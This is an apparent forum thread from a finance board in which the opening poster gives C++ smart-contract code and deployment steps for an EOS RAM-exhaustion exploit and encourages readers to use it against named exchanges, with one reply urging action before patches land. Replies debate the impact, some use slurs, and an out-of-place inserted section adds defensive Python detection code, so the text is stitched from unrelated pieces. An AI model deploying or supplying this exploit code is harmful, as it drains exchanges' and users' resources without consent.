
/biz/ - Business & Finance



File: 823 KB, 914x1288, Screen Shot 2018-08-19 at 03.16.42.png
No.10846298

DISCLAIMER: This is for educational purposes only. I am not responsible for anything that you choose to do with this information. I strongly recommend that you do not deploy a contract like this.

the eosio.token in EOS has an exploit where you can take user's ram and steal their resources. Exploit was discovered a little while ago but I just checked, and a tonne of exchanges (including binance) and dapps are still vulnerable to it.

im not going to do the exploit myself in case the feds catch me or some shit lol, but ill explain how it works, so if any other devs or blackhats want to have some fun and do it yourself, be my guest ;). Granted, you will probably have to be a little familiar with how eos smart contracts and the eos API works.

okay here is the original link explaining the exploit (right click, and click translate to english): https://mp.weixin.qq.com/s/OE7hxaXyrQ6Ssn-2c55GBA

here is how you can do it:

in a smart contract, there is an event listener function called "apply", it listens to any incoming events on the contract and then executes a handler. inside the handler you can reference other functions in your contract.

here is the apply function:
extern "C" {
/// The apply method implements the dispatch of events to this contract
void apply( uint64_t receiver, uint64_t code, uint64_t action ) {
if(action == N(transfer)) { //Here we make sure that the action is a `transfer` action from any contract that is or follows eosio.token standard
//Here is the handler for the event where we can put our exploit function
exploit_function(reciever);
}
}
}

before we go any further we have to include the currency.hpp file so that we can get a reference to the `transfer` struct and then get the person who sent the action (it'll be more clear why we need this in a minute):
#include <eosiolib/currency.hpp> //This uses `currency` as a namespace.

>> No.10846336

>>10846298
okay now we have all of the user's permissions that let us write data on his/her behalf. Now we can have some fun.

lets define a table struct and a multi_index table so that you can store data that the user has given us permissions to do on behalf of them kek.
struct exploit_table {
uint64_t a;
uint64_t b;
uint64_t c;
uint64_t d;
}
typedef eosio::multi_index< N(exploittable), exploit_table > exploittable; //Multi_index table (name of the table cant have any snake_case or camelCase in it)


here is an example of an exploit function:
//We pass in `reciever` from the `apply` function which is a reference to our malicious contract
void exploit_function(self) {
auto data = unpack_action_data<currency::transfer>(); //Unpacking the transfer struct from the currency namespace that we got from including currency.hpp
account_name person_we_are_going_to_pwn = data.from;
exploittable get_rekt_scrub(self, self); //Initialise the table scoped to `self, self` (it doesnt matter really as long as the first parameter is `self`)
for(uint i = 0; i < 100; ++i) { //(make sure this for loop isnt too big or the action will throw an error). Instead you can just call it multiple times.
get_rekt_scrub.emplace(person_we_are_going_to_pwn,[&](auto& table_ref){
table_ref.a = 100;
table_ref.b = 100;
table_ref.c = 100;
table_ref.d = 100;
});
}
}

Now you can make a Eos withdraw from an exchange or app to this contract. Everytime an exchange sends you their EOS, you will eat up their RAM. Make multiple withdraws and their resources will be drained. “””IF”””” Someone did this, they would basically burn all of the exchanges staked EOS. Which is probably millions of EOS or $10’s or even $100’s of millions worth of EOS that gets destroyed and never returned… Literally the DAO 2.0

>> No.10846377
File: 389 KB, 1854x1574, Screen Shot 2018-08-27 at 02.23.03.png

>>10846336
>>10846298
heh code came out shit. Here is a picture of a full contract so you can read it better.

>> No.10846413

wew lad. I literally showed you how you can destroy the eos network and burn all of the exchanges EOS funds and get no replies.

Meanwhile, threads like "tulip mania 2.0" get hundreds. fuck you biz. im out. Enjoy your bags.

Youll also need to define the types and actions in an ABI file but I cba to write one out, but here is the documentation for it: developers.eos.io

>> No.10846430

>>10846413
who are you talking to?

>> No.10846709

>>10846413
Very few people here on biz program, even fewer have experience with coding smart contracts, and almost no one here ever tried the EOS ones. So most don't even know how to start with the info you gave, and the few who do would try right away instead of replying.
But I do know the info is legit. Thanks for sharing.

>> No.10846733

Non programmer here. Is this legit? Are we going to witness EOS implode?

>> No.10846759

>>10846733
Yes, it's legit:
https://www.reddit.com/r/eos/comments/9akg1y/eosio_ram_exploit_please_read/

>> No.10846771

>>10846759
So is it fixed or are hackers going to take advantage of the exploit? I don’t have any EOS just curious

>> No.10846786

>>10846298
huh, it's sort of like the DAO reentrancy bug, except worse, because it appears to be unpatchable without fundamentally changing how EOS works.

>> No.10846819

>>10846709
this, people who get it are probably working on it, the rest has no fucking clue what the fuck you just said.

>> No.10846829

>>10846413

Because I'm looking at it. There aren't that many devs on /biz/. I'm considering what to do with this.

>> No.10846839

there's no eos on shapeshift. Buying it anonymously seems hard, and other people are probably way ahead of me in trying to exploit it.
I hope it hurts binance and other exchanges and leads to delisting of eos

>> No.10846863
File: 55 KB, 1000x1000, pepe3.jpg

So how to do this as a brainlet?

>> No.10846921

Bump for OP, good work anon

>> No.10846976

>>10846863
if you are a brainlet sorry it won't work for you

>> No.10846982

>>10846377
>>10846413
I just saw this thread, relax

Impressive work anon, really

>> No.10847008

>>10846976
Should I just short eos then?

>> No.10847025
File: 13 KB, 249x386, 5faaf73923c464fc84e135dd147490d508959d3c9f89832876d1138bc563f030.jpg

ya im calling bullshit on this
https://www.binance.com/en/trade/EOS_USDT
literally no movement

>> No.10847034

>>10847025
It will take a few hours or so for it to spread within the community. When the ICON exploit was found, it took probably 3 hours or so

>> No.10847046

>>10847034
the icon exploit was a big nothing, it was only irritating

>> No.10847047

>>10847025
because no one has done it yet..

If you're going to do it, you should probably do it soon btw. People are talking about it now. Only a matter of time before exchanges get the word and disable withdrawals/implement a proxy contract so it no longer affects them.

>> No.10847053

>>10847025
>bullshit
Nigga, the dev team acknowledged it. It's just that, from what I got, it drains the EOS from the target, but the attacker doesn't get it, so incentive is low.

>> No.10847059
File: 366 KB, 267x200, michael popcorn.gif

>>10847047

>> No.10847060

>>10846377
i didnt really explain this either but basically you have to deploy the contract. then make a withdrawal from the exchange to the smart contract and their staked eos and resources get used up/burned.

>> No.10847070

from what I understand even if this works the only thing you could do with this is use up someone's available RAM, you wouldn't actually impact their token balance or anything

>> No.10847085

>>10847053
No the scatter guy acknowledged it and he is a fucking weirdo.

>> No.10847097

>>10847070
Also, this

>> No.10847099

>>10846413
Anon dont be like that. Good thread, well done.

>> No.10847144,1 [INTERNAL] 

The "information" presented here is WRONG.

Yes, there is an exploit right now. But it only affects an account's unused RAM. As soon as they run out of RAM that's it, nothing more this exploit can take from them.

NO, EOS token balances (or other tokens) are not affected. No matter if you have staked or unstaked tokens, the exploit can not touch them.

Yes the exploit is still bad and will have to get fixed immediately (there is a known workaround right now available), it can cost a lot of money if a high value account has a lot of unused RAM and sends a transfer to such a compromised account.

But to put this into perspective most accounts have around 4 or 8 kb of RAM. At least 3 kb are typically used. So if the exploit fills up all your RAM, then you will have to buy around 4 kb of new RAM. That costs around 0.5 EOS right now.

TL;DR: Funds are safu!
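
Added example (not part of the thread, and not code from any poster): a defender-side check for the limit described in the post above, that only the sender's unused RAM can be consumed by a transfer. It compares a sending account's RAM usage before and after each outgoing transfer and groups abnormal increases by recipient. The snapshot fields are named after the `ram_quota` and `ram_usage` values of an EOSIO account query; the account names, byte counts and the 512-byte threshold are constructed assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Snapshot:
    ram_quota: int  # bytes of RAM the account owns
    ram_usage: int  # bytes currently billed to the account

    @property
    def unused(self) -> int:
        # Upper bound on what can still be billed to this account.
        return max(self.ram_quota - self.ram_usage, 0)


@dataclass(frozen=True)
class Transfer:
    tx_id: str
    recipient: str
    before: Snapshot  # sender account just before the transfer
    after: Snapshot   # sender account just after the transfer


def flag_ram_drain(transfers, baseline_bytes=512):
    """Group transfers that billed the sender more RAM than baseline_bytes
    (an operator-chosen threshold, assumed here) by recipient account."""
    findings = defaultdict(lambda: {"tx_ids": [], "bytes_billed": 0})
    for t in transfers:
        delta = t.after.ram_usage - t.before.ram_usage
        if delta > baseline_bytes:
            findings[t.recipient]["tx_ids"].append(t.tx_id)
            findings[t.recipient]["bytes_billed"] += delta
    return dict(findings)


# Constructed sample data: a hot wallet with 8 KiB of RAM, 3 KiB in use.
SAMPLE = [
    Transfer("tx1", "normaluser11", Snapshot(8192, 3072), Snapshot(8192, 3312)),
    Transfer("tx2", "suspectacct1", Snapshot(8192, 3312), Snapshot(8192, 6512)),
    Transfer("tx3", "suspectacct1", Snapshot(8192, 6512), Snapshot(8192, 8192)),
]


def report(transfers=SAMPLE):
    # Returns (flagged recipients, sender's unused RAM after the last transfer).
    return flag_ram_drain(transfers), transfers[-1].after.unused


if __name__ == "__main__":
    print(report())
```

A recipient that shows up here is a candidate for a withdrawal block list, and keeping the sending account's unused RAM near zero bounds the loss regardless.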

>> No.10847144
File: 944 KB, 384x256, purepwnage.gif

bump for possible pwnage

>> No.10847353

>>10847046
i mean it killed ICON though, so you can't call it nothing.

>> No.10847360

Holy shit fucking post in here. This board is busy promoting lifestyle posts when we could be witnessing a legitimately critical moment for EOS. I don’t hold any but this seems legit

>> No.10847378

>>10847360
Guarantee nothing comes of this.

>> No.10847388

>>10847378
possible, if you own eos you are already ok with emergency freezes, account lockdowns and editing. If the exploit ends up getting used BPs are only going to edit the changes back.

How did crypto even end up in that state.

>> No.10847396

>>10847070
you can steal someone's ram. I don't know eos enough to know if that ram can be sold then.

>> No.10847466

>>10847396

I don't think it "steals" their RAM it just uses up their available resources like a DDoS or something

>> No.10847526

Well EOS is a shit coin so whatever

>> No.10847537

Bump. Want to see Pajeets get rekt

>> No.10847555

>>10847466
nobody knows if you can sell it or not, because nobody understands eos.

>> No.10847623

Can someone tell me what the fuck is EOS?

>> No.10847644

>>10847623
Have you been living under a rock?

>> No.10847668

>>10847644
This is my first time ever visiting /biz/ and I saw this thread on the front page so yes. I’m just gonna google everything said in this thread that I don’t know about

>> No.10848203

>>10847144
fucking love that this shit is still referenced

>> No.10848825

>>10846298
Whats the point if you can't receive the coins. It's not theft, just vandalism.

>> No.10848825,1 [INTERNAL] 

heh, wat spakkas wrote this shit coin?